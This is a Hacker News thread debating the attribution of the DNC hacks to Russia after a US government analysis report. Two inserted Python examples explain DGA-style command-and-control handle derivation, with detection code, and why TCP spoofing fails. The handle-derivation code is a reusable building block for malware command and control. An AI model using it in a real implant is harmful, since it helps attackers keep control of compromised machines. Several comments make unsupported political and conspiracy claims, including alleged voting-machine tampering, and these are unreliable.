I have personally written that exact tool while learning Python. A RAT using Twitter for C & C. Uses PGP for encryption and verification. The Twitter handles for the C & C change based on a hash of Google's latest Doodle, so you can access it without fear of account deletion.

TIL I'm as good as a state level intelligence team.

Hey CIA/NSA we know you are reading this, my contact info is in my profile. Hire me.
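The rendezvous scheme described in the two comments above (C&C over a public site such as Twitter, with the account handle derived from a hash of something both sides can observe), as an added example that is not code from this thread or from any of the tools it names. The seed is a constructed byte string standing in for "hash of Google's latest Doodle"; the handle length, the alphabet, the `derive_handle`/`candidate_handles`/`flag_beacons` names and the observed-traffic tuples are all assumptions for illustration. The point for a defender is the second half: anyone who knows the scheme and the seed can precompute the same handles, which is exactly what makes this kind of C&C both cheap to build and cheap to detect.

```python
"""Deterministic C&C handle derivation (DGA-style) plus the defender-side check.

Added example; not code from the thread. The seed, names and sample traffic
below are constructed for illustration.
"""
from __future__ import annotations

import hashlib
import hmac
import string
from datetime import date, timedelta

# 36-character alphabet: lowercase letters and digits, as most handle rules allow.
ALPHABET = string.ascii_lowercase + string.digits

# Constructed stand-in for "hash of Google's latest Doodle" (hypothetical seed).
SEED = hashlib.sha256(b"constructed-doodle-image-bytes").digest()


def derive_handle(seed: bytes, day: date, length: int = 12) -> str:
    """Derive the day's rendezvous handle from the shared seed and the date.

    HMAC ties the output to the seed; the date gives a fresh handle each day so
    a suspended account only costs the operator one day. The modulo bias of
    `b % 36` is irrelevant here: the goal is determinism, not uniformity.
    """
    digest = hmac.new(seed, day.isoformat().encode(), hashlib.sha256).digest()
    return "".join(ALPHABET[b % len(ALPHABET)] for b in digest[:length])


def candidate_handles(seed: bytes, start: date, days: int) -> set[str]:
    """Defender side: precompute every handle the implant could use in a window."""
    return {derive_handle(seed, start + timedelta(days=d)) for d in range(days)}


def flag_beacons(observed: list[tuple[str, str]],
                 candidates: set[str]) -> list[tuple[str, str]]:
    """Return the (host, handle) pairs from observed traffic that hit a candidate.

    `observed` models proxy-log entries reduced to (destination host, account
    handle requested); matching entries are the beacons worth investigating.
    """
    return [(host, handle) for host, handle in observed if handle in candidates]


if __name__ == "__main__":
    today = date(2016, 12, 29)
    handle = derive_handle(SEED, today)
    window = candidate_handles(SEED, today - timedelta(days=3), 7)
    # Constructed proxy-log sample: one beacon, one ordinary account.
    sample = [("twitter.com", handle), ("twitter.com", "some_legit_user")]
    print("today's handle:", handle)
    print("flagged:", flag_beacons(sample, window))
```

The defender's precomputation only works once the seed source is known, which is why the "hash of today's Doodle" trick is used at all: the seed changes without the operator touching any infrastructure. Once a sample is in hand, though, the seed rule is read straight out of it, and the whole future handle list falls out, so this buys the operator deniability for account takedowns, not for attribution.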


Tomorrow: "Cyberhacker admits to Russian hacker tools"

> Yesterday, an Internet cyber hacker using the alias "cmdrfred" claimed on "HackerNews", an elite underground hacker site, that he or she personally built the hacking tools used by Russia to breach the DNC email servers and change the outcome of the recent election.

> "I have personally written that exact tool [it] uses ... encryption ... so you can access [the DNC] without fear."

> "I'm as good as a state level intelligence team."

> cmdrfred went on to taunt American intelligence agencies while admitting that he was aware that elite anti-cyberhacking teams from the NSA and CIA were monitoring his operations.

> The owner of HackerNews Paul Graham -- venture capitalist, flamboyant playboy, and known Russian sympathizer -- could not be reached for comment.


> TIL I'm as good as a state level intelligence team.

Not to totally ignore the pithiness, but I feel like your comment touches on something I see a ton here (and elsewhere): an offhand dismissal of the 'state level' intelligence capacity.

At the end of the day, the systems were exploited. That more sophisticated methods went unused should be a measure of efficiency and not necessarily execution. Why break out the trick play if your opponent can't keep from you running it up the middle?


True. But the absence of sophistication constitutes evidence neither in favor nor against the "State Actor" hypothesis.


Until a Russian name or IP address is provided, the accusations fail to hold water. An incomplete proof is equivalent to "'cause we said so"


If you are targeting a US political entity, using a staging server in Russia probably isn't the worst idea, so unless the IP address directly ties to the Russian government/intelligence services, it's still only weak evidence of Russia's involvement.


Spoofing ips is absurdly easy.


I agree that IP addresses aren't good evidence but it isn't really possible to spoof TCP in practice.

http://security.stackexchange.com/questions/55279/how-easy-i...
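Why the comment above is right that a spoofed source address does not get you a TCP connection, as an added example that is not code from the thread or from the linked answer. It models only the part of TCP that matters for the argument: the server's SYN-ACK carries a random 32-bit initial sequence number (ISN), and the handshake completes only if the final ACK acknowledges ISN+1. A legitimate client receives the SYN-ACK and so knows the ISN; an off-path spoofer forged the source address, so the SYN-ACK is routed to the real owner of that address and the spoofer can only guess. The `Server` class, the addresses and the `isn_source` hook (which lets the example show a predictable ISN alongside a random one) are assumptions for illustration.

```python
"""Why blind IP spoofing does not complete a TCP three-way handshake.

Added example; not code from the thread. Addresses and class names are
constructed for illustration.
"""
from __future__ import annotations

import secrets
from typing import Callable, Optional

ISN_SPACE = 2 ** 32  # TCP sequence numbers are 32-bit


class Server:
    """Toy TCP listener tracking half-open and established connections."""

    def __init__(self, isn_source: Callable[[], int] = lambda: secrets.randbelow(ISN_SPACE)):
        # isn_source exists so the example can show a predictable ISN too.
        self.isn_source = isn_source
        self.pending: dict[str, int] = {}      # src addr -> server ISN sent in SYN-ACK
        self.established: set[str] = set()

    def on_syn(self, src: str, client_isn: int) -> tuple[int, int]:
        """Handle a SYN; the returned (ack, seq) is the SYN-ACK, delivered to `src`."""
        isn = self.isn_source() % ISN_SPACE
        self.pending[src] = isn
        return ((client_isn + 1) % ISN_SPACE, isn)

    def on_ack(self, src: str, ack: int) -> bool:
        """The final ACK completes the handshake only if it acknowledges ISN+1."""
        isn = self.pending.get(src)
        if isn is None or ack != (isn + 1) % ISN_SPACE:
            return False
        del self.pending[src]
        self.established.add(src)
        return True


def legitimate_handshake(server: Server, addr: str = "10.0.0.5") -> bool:
    """On-path client: it receives the SYN-ACK, so it learns the server ISN."""
    client_isn = secrets.randbelow(ISN_SPACE)
    _ack, server_isn = server.on_syn(addr, client_isn)   # SYN-ACK arrives at addr
    return server.on_ack(addr, (server_isn + 1) % ISN_SPACE)


def blind_spoof_attempt(server: Server, spoofed_addr: str = "203.0.113.7",
                        guessed_isn: Optional[int] = None) -> bool:
    """Off-path attacker forging spoofed_addr as the source.

    The SYN-ACK, and the ISN inside it, is routed to the real owner of
    spoofed_addr and never reaches the attacker, who can only guess the ISN.
    """
    server.on_syn(spoofed_addr, 0)          # SYN-ACK goes to spoofed_addr, unseen
    if guessed_isn is None:
        guessed_isn = secrets.randbelow(ISN_SPACE)   # 1 in 2^32 chance of being right
    return server.on_ack(spoofed_addr, (guessed_isn + 1) % ISN_SPACE)


if __name__ == "__main__":
    print("legitimate:", legitimate_handshake(Server()))           # True
    print("blind spoof, random ISN:", blind_spoof_attempt(Server()))  # False (almost surely)
    predictable = Server(isn_source=lambda: 123456789)
    print("blind spoof, known ISN:", blind_spoof_attempt(predictable, guessed_isn=123456789))
```

The last line is the caveat: blind spoofing against TCP was practical in the 1990s precisely because ISNs were predictable, and it stopped being practical once stacks randomized them. It also shows why a source address in a packet capture is weak evidence either way: for TCP sessions the address almost certainly belongs to a machine the attacker really controlled, but, as the comment two levels up says, that machine can be rented anywhere, including in Russia.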


> That more sophisticated methods went unused should be a measure of efficiency and not necessarily execution. Why break out the trick play if your opponent can't keep from you running it up the middle?

I question how efficient it is to get caught red handed in the cookie jar of the worlds only super power.

Sure Vladimir Putin could invite President Obama to a state dinner and then proceed to blow his head off with an AK-47 but that would lack the subterfuge I expect from "state level actors". If this is indeed the Russians, they are as laughably incompetent as our elected officials in regards to infosec and thus a threat to no one.


Publicly assassinating the president of a country is slightly different than pilfering clumsily guarded emails of campaigning politicians. One starts world wars. The other doesn't.


I'd like to believe that it won't.


RNC got hacked but nothing was leaked.


Source?


“We now have high confidence that they hacked the D.N.C. and the R.N.C., and conspicuously released no documents” from the Republican organization, one senior administration official said, referring to the Russians. http://www.nytimes.com/2016/12/09/us/obama-russia-election-h...


The article is very unclear. Here's another quote in the same article that says the hacks against the RNC failed. The NY Times is basically telling us that they received conflicting reports from different anonymous and similarly credible sources.

"One senior government official, who had been briefed on an F.B.I. investigation into the matter, said that while there were attempts to penetrate the Republican committee’s systems, they were not successful."


The "evidence" boils down to:

The Hackers drove a truck.

Russians drive trucks.

The Russians did the hacking.

While its insulting that our government would try to pass off this drivel as "evidence", I'm much more dismayed that so many of my fellow Americans will uncritically accept it as such.


The actual evidence is probably closer to 'we have moles in the Kremlin and taps on their phones', but they're not exactly going to publish that, are they.


Perhaps. If that's the case, maybe they'll solve the problem using similar cloak-and-dagger methods, like retaliating by arranging to have a Russian government official assassinated or something.


Isn't that kind of obvious to everyone at this point? It's just not out in the explicit open with the right kind of language. By giving such meager evidence of a "certainty", they're essentially giving away that they determined this via other means.

So, right now, let's assume it was a Russian spy agency that hacked the DNC. They're sitting there, thinking, "wow, these FBI folks somehow figured out it was us.". Then after reading this paper, "hmm, that's not a whole lot of evidence, they must have some proof that they're hiding. They must have a mole in our office. Find him, now."


The DNC has to keep their voters mad at an external entity, lest they realize how the DNC sabotaged itself in this election with the "pied piper" strategy to promote Trump, as well as funneling all the money from state-level campaigns into Hillary and making the losses even worse.


Wasn't the NSA spying on the whole Internet or something? Are you telling me the NSA saw no evidence of Russia hacking the DNC servers? They wouldn't necessarily have to reveal their "methods" that it was the Russians if it was the NSA catching them and not some Kremlin CIA spy.

But who knows, maybe they are too busy spying on hundreds of millions of Regular Joes to watch out for all of the Russian attacks.


Haven't the NSA already said they believe it was the Russians? As you suggest, they would be the ones to know.


The NSA doesn't, in general, publicly announce anything. They exist to supply analysis to other branches of government, and only very rarely to the public directly. So the absence of commentary from them in public doesn't indicate that they haven't drawn conclusions and passed them along.


Source? I googled it and only found articles suggesting the opposite.

e.g. https://theintercept.com/2016/12/29/top-secret-snowden-docum...


If they're not going to publish their (hypothetical, ostensible, theoretical, possibly entirely imaginary) evidence, then why would we put much faith into their claim? It's not like all major US intelligence agencies haven't led deception campaigns against the public before.


There is a fair amount of public evidence lying around tying the hacks to Russia or at minimum Russians, including CrowdStrike's recent report about Ukrainian artillery. Considering that, it seems more likely that US intelligence has their own evidence, as they claim, than that they're simply making things up (at the risk of substantial embarrassment).


This is not evidence, and it is unlikely evidence would be released. The Administration (as is usually the case for any US executive on any issue unless they are seeking action that requires legislation or a court verdict or something similar by some formal body outside of the executive branch) is not engaging in an effort to prove anything to anyone.

This is an analysis report with information (including most significantly the IOCs in the accompanying files), some of which is previously released and some of which is newly declassified, for use in defending against and forensically identifying attacks by the threat groups identified.

No one is passing this off as evidence of anything.


I think the discussion of sources will be very interesting. There is a strong national interest in restoring faith in our electoral process. This is why so many were appalled at certain accusations that the election was "rigged".


It is more like:

1. Hackers drove a custom built tank that has Moscow factory markings.

2. Similar versions of the tank were used in other campaigns attributed to Russian intelligence.

3. Crew in the tank has been associated with Russian intelligence operations going back ten years.

4. The tank left from a building known to be associated with Russian intelligence hacking campaign.

Thus, the hackers probably take orders from Russian intelligence.


You should mention that the tank with the crew they have inside is publicly available to anybody in the malware archives of APT28/29. Anybody can plant it. Also, both the PowerShell and the py2exe are completely reversible, so you can take it, modify it, and whose creation is that now? If there is kernel-level stuff then it would be a more solid case, but not by much. On top of that, it's entirely possible another completely unrelated attack is responsible for the leaks, but the malware used cleaned up after itself, leaving only the less sophisticated trail behind. Clearly, if 2 groups hacked them in the easiest way possible, it's in fact suspicious why they haven't been hacked by other groups. It's almost a certainty others came after it.


>Also both the powershell and the py2exe are completely reversible so you can take it, modify it and who's creation is that now?

What about X-Agent? Seems like it would be harder to modify but I haven't looked into it.

>On top of that, it's entirely possible other completely unrelated attack is responsible for the leaks, but the malware used cleaned up after itself, leaving only the less sophisticated trail behind.

I like this point but it could be brought up in nearly all attributions.


Got a link to the archive?


This report merely points the finger at Russia; it does not purport to substantiate that allegation.

   Previous JARs have not attributed malicious cyber activity to specific 
   countries or threat actors. However, public attribution of these activities 
   to RIS is supported by technical indicators from the U.S. Intelligence 
   Community, DHS, FBI, the private sector, and other entities.
The report then discusses what the attackers did and mitigation strategies.


>This report merely points the finger at Russia; it does not purport to substantiate that allegation.

That's the point, it's just another completely baseless, unsubstantiated accusation. This report contains nothing that suggests that the Russians were any more likely to be the source of the hack than countless other entities. The problem is that these baseless claims are being presented as evidence and being consumed uncritically as such. Take for example the headline in PCMag:

>Hacking Evidence in Hand, Obama Sanctions Russia

http://www.pcmag.com/news/350675/hacking-evidence-in-hand-ob...


https://en.wikipedia.org/wiki/Stanislav_Petrov

Are you trying to live up to the username or using it ironically?


This report doesn't claim to substantiate those allegations. It merely repeats them.


By the Big Lie theory, what's the diff?


This (complaining about the lack of evidence) just seems ludicrous to me. Does the FBI have a history of declassifying stuff like this so that randos on the internet can independently verify its conclusions? When high-level intelligence people collude to lie to the American people and discredit a president, do they usually do it via press release clearly written by a PIO?

The accusation that people who find this credible are uncritical is unfounded and insulting. The question is not "would someone in a government agency lie for political reasons," it is "would this many people, in a bunch of different agencies that have a history of lying to and competing with and distrusting each other, all sign on to the same lie, publicly, even though it's almost certain to be disproven in a few months."

Meanwhile, here's the alternative theory:

1. Some Russian intelligence agency hacked the DNC's email servers

2. They left behind evidence

3. The FBI/NSA/DHS/etc found that evidence

4. They classified it and aren't going to put it in a press release

None of those are the least bit hard to believe, and they are collectively WAY easier to swallow than this hypothetical vast, high-level conspiracy to discredit Trump or whatever it's supposed to be for.


Except that this is a sort of exclusion of the middle; you say "here's the alternative theory", but there are other even more likely possibilities. Here's one:

1. The DNC and their members are generally ignorant of good security policy and had an easily hacked system.

2. Some Russian intelligence agency hacked the DNC's email servers.

3. A bunch of other people/hackers/groups hacked the DNC's email servers, as it was "left out in the open", so to speak, and was a trivial target.

4. One group at least used trivial methods to do so and left behind evidence.

5. The FBI/NSA/DHS/etc found that evidence.

6. One of these hackers passed information to WikiLeaks. WikiLeaks has denied that it was Russians who did this.

7. The FBI/CIA claim that the Russians hacked the DNC servers.

8. The press and political opportunists jump to the conclusion that it was the Russians who released this information to Wikileaks.

9. The FBI/CIA classified what they found and aren't going to put it in a press release.


Point 7 is the one you're supposed to be trying to explain. The FBI, CIA, DHS and NSA have all said, in plain language, no anonymous sources, just regular old press releases, that Russia hacked the DNC. The reasons they might say this are a) they believe it due to some evidence they are not releasing, and b) ???. Theory a) seems pretty believable, and I haven't heard a b) that sounds remotely plausible yet.

Whether someone else also hacked the DNC would be interesting to know, but it doesn't really impinge on the question of whether there is or is not a vast-but-also-ham-handed-and-kind-of-contradictory conspiracy pushing theory a.


> Point 7 is the one you're supposed to be trying to explain

Except that point 7 isn't at all controversial. EVERYONE hacks EVERYONE ELSE in cyber-espionage; even Canada was probably hacking the lame-ass security DNC email server, if only to fill a dossier. Remember that Clinton was set to be the next president of the United States; it is very much in Russia's (and anyone else's) best interest to know as much about her and her team as they can learn. It's the job of American spooks to prevent this, and they completely fucked it up.

Frankly, I find the suggestion that telling voters more about their candidate constitutes 'interference' to be repugnant; but assuming that we are going to engineer a scandal about this, we need to ask whether the Russians released that information to Wikileaks? All of the evidence (ie what Wikileaks says) says otherwise.


Er, the parent was replying to a poster who implied he did not believe "point 7."

>Frankly, I find the suggestion that telling voters more about their candidate constitutes 'interference' to be repugnant

Really? By this argument, I take it you believe political candidates' email (or cough tax returns) should automatically be made public?

Much as I agree with transparency, I think we need to recognize that everyone--including political candidates--has some right to private communications.

> but assuming that we are going to engineer a scandal about this, we need to ask whether the Russians released that information to Wikileaks?

The publicly released circumstantial evidence about Russian backing of "Guccifer 2.0" is fairly convincing, I would say. But (contrary to your claim above) the media have not "jumped to the conclusion" that the Russians were the ones who released the leaked emails; the FBI claimed* Russia was not merely behind the attacks but behind the leaks.

You all can debate the merits of trusting intelligence agencies or not, but the situation you described--in which the IC only suggested Russia was behind some intrusions but not the leaks--is not in fact the world we live in.

* http://www.wsj.com/articles/top-russian-officials-shift-away...


>Much as I agree with transparency, I think we need to recognize that everyone--including political candidates--has some right to private communications.

No, they don't, unless you see the need for them to act against our interests without our knowledge because markets or something, or see some sort of right for them to rule others.


So you believe that all email communication from all elected officials and candidates should be made public?

What about non-email communication? Face-to-face conversations should all be public? Does this extend to classified briefings? Should, for example, discussions of "Olympic Games" have been public before it was executed?


Point 7 wasn't that the hack took place or the matter of who did it, it's the three-letter-agencies publicly accusing Russia of it. They did so because a) they believe it's provably true, or b) ???.


b) It justifies their ongoing employment.


> Except that point 7 isn't at all controversial. EVERYONE hacks EVERYONE ELSE in cyber-espionage

It's like in Germany where they're up in arms against this and seem to have forgotten the revelation that the USA was tapping Merkel's phone...


> b) ???

How about the FBI/CIA/DHS/NSA don't like people who don't play by the accepted rules sticking their nose into their business, so they tell a little white lie to try to avoid that?

The three letter agencies have had plenty of people killed before, so "they'd never do that" isn't going to get you very far.


Think this through. Multiple people in the FBI, CIA, DHS, and NSA all decided this? Together? Did they have meetings? And no one is spilling the beans, even though there are maybe dozens or hundreds of people in on it? Not one of them has more to gain by revealing the conspiracy than by keeping silent? And they're all so confident that no one will squeal that they're having press releases now? And the point of this whole treasonous conspiracy was to cause a minor inconvenience for their soon-to-be boss?

That's more believable than "Russia hacked the DNC and the FBI was honest about it"?


Haha, I know, it does sound rather crazy. However, once again I will play the Snowden card: all of that was called crazy conspiracy talk, because there would be too many people involved who <insert your words here> so thinking that is just crazy.

It's certainly not crazy to not trust these people. Deceit is their job.


Not to mention the number of dinosaurs still in each institution that can be simply told what to believe when it comes to technology.


Could you please link to these press releases?

It's been very difficult for me to wade through the muck on this one.


I'm referring to parent of this whole thread, which (briefly) is a press release that says, "Here are some ways you can protect yourself from the kind of attack the Russians did on the DNC" and then goes on to describe spear-phishing.

The reason this is unusual is because the intelligence agencies are being so matter-of-fact about this. They're not trying to convince anyone, like they did with Iraq's WMDs. They're not giving out pointed leaks and then officially denying them. They - meaning multiple agencies - are jut saying, "Yeah, it was Russia", as if it's a settled issue.

The conclusion I draw from this is that there must be very strong evidence. Could that evidence be forged? Sure! (Another reason why the "show me the evidence or I won't believe it!" people sound nutso - why would they think it wasn't forged?) But to believe it's forged we need at least a plausible theory as to who would forge it and why. Right now, I'm drawing a blank.


Absolutely any state that would enjoy the benefits of the distractions that comes with an escalated political conflict, Israel, China, Saudi Arabia. Think about how quickly Erdogan switched from being US ally to being best chums with Russians and helping with the peace negotiations with Iran after the attempted coup. Was it Russia, was it US, what was the motive, does one have motive to frame the other?

It's not their job to do the convincing, they leave that to CNN, MSNBC or FOX. They just give some superficial material to get the ball rolling. There was next to no in depth articulation as to how this was definitely Russia. They're still twiddling their thumbs and saying 'we're confident' it was them.


You're suggesting that a foreign country supplied the FBI with forged evidence, and the FBI said, "Well, this doesn't match our own investigation, but I guess we'll just assume it's true anyway, now let's announce it to the world on our official letterhead"? Does that sound likely to you?


Do the intelligence agencies actually agree on this as unanimously as you're saying? Here's a quote from the testimony of James Clapper on Russia/Wikileaks connection:

"The evidence there is not strong" https://www.c-span.org/video/?c4631568/clapper-wikileaks-con...


That was from a month and a half ago. It seems more likely that he's changed his mind or seen new information than that the DHS and FBI are putting out joint press releases that contradict the beliefs of the DNI, but who knows, maybe the DHS/FBI leadership is involved in some kind of squabble with Clapper or something....?


You're assuming this is true and coming up with speculation. Meanwhile, we can look up the names of many of the reporters spreading these rumors and find that they coordinate with the DNC.

Also, you think it's a conspiracy theory that the DNC would attack Trump? So... you don't seriously think that the RNC's media allies attacked Clinton? That's, uhh, just not how it works.

The DNC has very good reasons to deflect this one. They funneled all the state-level money to Hillary and made their losses worse. They helped promote Trump and the other "pied piper" candidates in the media early on. Their token opponent, Sanders, got far more enthusiasm than Hillary and both candidates under-performed past ones, with Trump edging her out based on smaller losses and working the electoral college to his advantage--a failure reminiscent of how Obama beat Hillary by focusing on delegates. They have to pin the failure on someone else for their own survival. If the average voter saw the actual emails and realized just how much the DNC orchestrated just to shoot itself in the foot here, they'd demand their replacement.


The FBI has a history of political activism, to put it lightly. Here's a fun one: https://en.m.wikipedia.org/wiki/FBI–King_suicide_letter

You're being foolish if you trust a word the FBI says without solid evidence.


I don't! Dammit, read the post! No one on god's green earth trusts the FBI at their word, but that doesn't mean you can assume the opposite of what they said is true without evidence!


I suppose that depends on the expected reaction to either believing or not believing. In this case, from my perspective, I see two intended reactions to the claims of Russian subversion:

1) To delegitimize the President-elect

2) To foment war with Russia

I didn't vote for the guy but I don't think he's near so bad as his political opponents try to paint him. I'd like to at least give him a chance and to whatever degree he turns out to suck, I'll still blame the Clinton campaign for promoting controlled opposition 'pied pipers' rather than promoting a robust debate in the interest of the American people.

Wrt #2, I will certainly demand very strong evidence before yielding any resistance to that notion.


Seriously. Clapper lied directly to Congress under oath on TV. The whole "they know what's best for us and our only choice is blind faith" attitude is really disturbing.


> The whole "they know what's best for us and our only choice is blind faith" attitude is really disturbing.

This is so, so insulting. There is no way a fair observer could read the comments here and conclude that the people who find Russia hacking the DNC credible do so because they have blind faith in Clapper or the FBI or anyone else.


> There is no way a fair observer could read the comments here and conclude that the people who find Russia hacking the DNC credible do so because they have blind faith in Clapper or the FBI or anyone else.

Isn't that what you were more or less saying here: https://news.ycombinator.com/item?id=13281736


No. I believe the official version (that the reason the intelligence agencies are accusing Russia of hacking the DNC is because believe it did) because the alternative is less plausible and there's no evidence for it. That's pure Occam's Razor, no faith involved.

The FBI has lied and will lie again, getting me to believe they lied about something is not hard, but they don't generally do it in big, obvious ways that are easy to disprove and involve a lot of co-conspirators and don't accomplish anything.


That's not how Occam's razor works. You don't pick the most likely single outcome and then just assume that to be true with 100% confidence. Occam's razor is just an informal statement of the fact that you should assign a higher a priori probability to simpler hypotheses. It doesn't mean you should ignore any marginally less likely hypothesis.


Please stop accusing people of being 100% confident. It's such a weak, insulting tactic. What is the alternate hypothesis that's "marginally less likely"?

(Please remember what question we're trying to answer. It is not "Who hacked the DNC?". We are not in a position to know; hell, we don't even know there was a hack. It is also not "Is the FBI trustworthy?" Of course they're not. It is "Why are US intelligence agencies saying they have proof that Russia hacked the DNC?" The base hypothesis is "Because they do." The alternate hypothesis is what you're supplying.)


> Please stop accusing people of being 100% confident.

To quote you:

> No. I believe the official version

> What is the alternate hypothesis that's "marginally less likely"?

That Russia didn't hack the DNC. I think it's actually marginally more likely that Russia didn't hack the DNC than that they did, but I was humoring you.


I repeat:

> "Why are US intelligence agencies saying they have proof that Russia hacked the DNC?" The base hypothesis is "Because they do." The alternate hypothesis is what you're supplying.


What do you mean by "base hypothesis" or "alternate hypothesis"? Those aren't real terms in hypothesis testing. I think you might want to do some reading on Bayesian reasoning, and its relationship to Occam's razor.


Those are not highfalutin technical terms, just casual everyday language. Stop waffling and tell me what this theory is that I'm a brainwashed sheep for not believing!


Alternative hypotheses are that they don't like to have their activities monitored, and they like people that can be manipulated with propaganda. Trump seems potentially problematic in both respects.

If these organizations are involved in questionable undertakings (it's their job, so I think we can agree the answer is yes), it's not much of a stretch of the imagination that they like to operate without supervision.


everyone is innocent until proven guilty... there is no proof in the report that hacking even took place: date, time, size of materials, exact mechanism of attack, which email address was compromised, which link was attached to the email, what happened after the link got opened, why Outlook did not block the link, why antivirus did not block the exploit being installed, which exploit, why the firewall accepted outgoing traffic to an unknown source outside of the trusted network ... why Russians?


I don't necessarily disagree, but a guilty charge shouldn't be based on the "most plausible" explanation.


I, for one, wholly support the "insulting" of the treasonous reptiles that infest our secret agencies, on every possible occasion. The nation and world would be better off if they all jumped in a lake.


Do you have any evidence to back up your utterly ridiculous claims?

And yes, claiming that's all the evidence that exists is complete bullshit.


The purpose of these "reports" and the retaliation against the Russians is to undermine the legitimacy of the Trump presidency. There's no need for proof, just innuendo and allegation would do. Pretty sick of technology getting dragged through the mud for political purposes.


This is the least plausible conspiracy theory I've ever heard. C'mon man. Imagine you're whoever-it-is you think is behind this, and you want to discredit Trump for whatever reason. What would you do?

You've got access to all of his tax returns, and all the sealed details of his divorces, and all of his medical records, and all of his business records. You've got a whole squad of spies working for you, you can fabricate evidence, whatever you want. And this is a guy who has outstanding loans from Russian banks in the hundreds of millions of dollars, and who has cheated on at least two of his wives. And this is what you go with? Accuse someone unrelated to him of hacking into someone unrelated to him? That's your big plot? And you wait to do it until after the election? Via press release?


The Democrats (of whom I am one since birth) are using "The Reds did it!" as a tried and true excuse to explain the utter failure of their muddled, ineffective ideology on the national stage.

It's face saving through and through. And it makes a better story than "Trump beat us because we half-assed this election."


To be fair, I think three things:

1. The Democrats ran a crap campaign based (in part) on racism and sexism. They probably would've lost by a wider margin to a ham sandwich than they did to Trump.

2. Russia probably is behind the DNC hacks and definitely tried to meddle in the election.

3. Russia definitely took hints on what would be useful from Trump and Trump probably actively collaborated with them.

Just because I think Russia meddled in the election doesn't mean that either domestic party ran a good campaign, or that Russia was ultimately able to sway the election.

The only question I want the intel community to weigh in on is the politically charged one they're avoiding: did Trump actively collaborate with a foreign power during the election?

That question is of pressing import (and disqualifies him from being president if he did). The rest of it is just details.


I think the parent of your post was implying there are 2 parties here: the one responsible for the hack, and the people saying the hack was the Russians.


All those you mentioned don't interfere with the election process. The last couple of weeks all I have heard was Russians rigging the election process to help elect Trump, i.e. the election result is not what it should be, i.e. Trump's presidency is not completely legitimate.

It has been a couple of weeks of non-stop Russia blaming from the news. So far there's not much direct evidence beyond an unnamed CIA source. Now this lackluster report and Obama expelling Russians happen on the same day. It really smacks of an orchestrated political propaganda campaign.

Mind you I am not a blue dog Republican. I've voted 16 years straight for Democratic tickets including twice for Obama. The Democratic Party has been a real disappointment this year, and Obama making this last partisan political act really tarnishes his legacy.


[flagged]


I disagree. All signs point to Russia wanting peace with the US, and I think they are cozying up to Trump so he will roll back the sanctions that have been choking the Russian economy since 2014 or so.

Clinton was the one saber rattling against Russia during the election, not Trump. So assuming your theory is Russia hacked the DNC, their motivations seem to be to avoid war, not escalate.

However, there is definitely a cultural war going on within Western civilization between cultural Marxists wanting a global, totalitarian state and libertarian civic nationalists wanting a decentralized, limited state.

Where Russia comes in, and what's really funny about all this, is that the "right" now finds itself aligned with former Soviet communists and the "left" finds itself aligned with the Islamic caliphate. Politics can make strange bedfellows indeed.


> This attacks could be easily mitigated. [...] second, we should start using physical cryptographic keys instead of passwords

Man--I like the way you think, I really do, but this is not "easy". Technical simplicity and social ease are vastly different, and it's usually the humans who are getting hacked.


Can confirm. I did tech at the DNC in 2012. We pushed to get senior staff using 2FA and ran internal phishing drills. Obviously didn't take.


That's super annoying. The 100 person startup I'm at uses 2 factor authentication! It's so easy these days there is no technical excuse anymore.


I'd be willing to bet the 100 person start up you're part of is largely of a different demographic than the parent's DNC staff group.


Hmm. Maybe we should chat? Not directly related to this, but I'd love to pick your brain. Email's in my profile.


I honestly think politicians have stopped using email. This leak was so inconvenient that it has changed behaviors.


If an organization is working with sensitive data maybe they should invest some resources into security. I understand it is not easy because companies like Microsoft have been releasing poorly designed software (with things like autorun for USB drives) for 20 years and it still is the leader. But we have to advance step by step. For every single person needing executable attachments there are maybe a million users who can run them without understanding the consequences.


I mean, you're talking about the campaign of a person who was running while being investigated for circumventing security procedures. Regardless of what you think about those topics or their validity, is it that surprising that the campaign wasn't up to par on the security front?


You're conflating 2 different stories. HRC had no say over how the DNC ran their email nor were they subject to any special regulation as a private organization. Although it's been widely speculated there's yet no proof that HRC's private email server was ever hacked.


The RNC was hacked as well, although they similarly circumvented the same security procedures.


That the RNC was also hacked seems to be a popular, but probably false, meme.

http://www.cnn.com/2016/12/10/politics/smerconish-spicer-hac...


Belief in this will likely depend on who someone trusts more, spokespersons for the RNC, or the New York Times and the Washington Post.


From the New York Times article: "One senior government official, who had been briefed on an F.B.I. investigation into the matter, said that while there were attempts to penetrate the Republican committee’s systems, they were not successful."

From the WaPo: "U.S. officials said the Republican National Committee’s computer systems were also probed and possibly penetrated by hackers tied to Russian intelligence services, but that it remains unclear how much material — if any — was taken from the RNC."

There were a number of significant caveats in the NYT and WaPo reporting of this that people have ignored because it confirms their existing assumptions. Probably by design; it lets the papers push their preferred narratives whilst giving them something to fall back on if it turns out not to be true.


My other post is flagged and downvoted by well, yeah, I'll keep it civil despite them.

But the point was, the Russian hacker forums are orders of magnitude better than anything offered in English, and virtually every single one has made no secret (other than you need to read Russian) that they were working hard all year to get Trump "elected". From spreading rumours, distributing any dirt they could elicit, to boots on the ground playing with the voting machines. There was even talk of cash incentives from George Soros and Peter Thiel.

WaPo and NYT undoubtedly have journalists that both read Russian and frequent such forums. But it will be a while before they get the courage to go public with just how much US infrastructure is now completely pwned by the Ruskies. RNC and DNC only made headlines because some of the haul got sent to WikiLeaks aka FVEY.

My personal opinion is "America" deserves it for all the effort they put into making systems insecure.


"Maybe" they should. But almost none of them do.

That's why it's a social problem, not a technical problem, yeah?


I think it is rather the problem of poorly designed software. It is impossible to make millions of users set up some secure configuration, install firewalls etc.

The software should have secure default settings, if a user is not a computer engineer he should not be able to execute files from email attachments.


I think it's a generational thing. Americans of a certain vocation and certain age and older tend to have no idea about how this whole Internet thing works. No matter what their education level or achievement level. Obama held onto his Blackberry for almost 2 years after SS told him you can't use that thing.

I suspect what needs to happen is each branch of government needs to have infosec people assigned to it that sets standards and policies around this stuff. If they don't comply there have to be consequences.


It's not necessarily a generational thing. John Podesta was suspicious and sent the phishing email to campaign IT. Clinton campaign IT screwed up and told him to click the link and reset his password. Podesta is in his 60s and the IT people look like they're in their 20s.


> I think it's a generational thing. Americans of a certain vocation and certain age and older tend to have no idea about how this whole Internet thing works. No matter what their education level or achievement level

That is an impressively dismissive statement.


Well, we've been working on making it pretty easy over at Userify! but, truthfully, we're only tackling one piece of the puzzle (SSH keys). Your point is well taken about websites/web apps designed for mere mortals.

TLS client auth is really pretty much a dead letter: it's not easy at all. The biggest impediment for widespread TLS client auth seems to be that CA's are involved.

U2F might help.. and widespread MFA/2FA. Maybe we shouldn't be just tossing out passwords just yet, but just pushing for full MFA support for mission critical apps.


